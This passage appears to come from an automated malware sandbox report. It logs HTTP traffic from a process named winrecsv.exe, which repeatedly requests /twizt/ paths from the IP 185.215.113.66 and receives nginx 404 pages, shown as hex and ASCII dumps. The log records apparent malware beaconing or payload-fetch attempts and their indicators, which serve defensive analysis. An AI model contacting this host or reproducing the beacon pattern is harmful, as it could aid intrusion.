                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:32:09.696106911 CEST6315OUTGET /twizt/6 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:09.757704020 CEST6316INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:09 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                7192.168.2.749794185.215.113.6680C:\Windows\winrecsv.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Aug 15, 2022 18:32:12.991106033 CEST6317OUTGET /twizt/2 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:13.048749924 CEST6318INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:13 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:32:14.066327095 CEST6318OUTGET /twizt/3 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:14.123684883 CEST6319INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:14 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:32:15.134737015 CEST6319OUTGET /twizt/4 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:15.194560051 CEST6320INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:15 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:32:16.212922096 CEST7016OUTGET /twizt/5 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:16.270699978 CEST7017INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:16 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:32:17.289227009 CEST7017OUTGET /twizt/6 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:17.350804090 CEST7018INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:17 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                8192.168.2.749797185.215.113.6680C:\Windows\winrecsv.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Aug 15, 2022 18:32:20.586002111 CEST7025OUTGET /twizt/2 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:20.643721104 CEST7026INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:20 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:32:21.672964096 CEST7026OUTGET /twizt/3 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:21.729661942 CEST7027INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:21 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
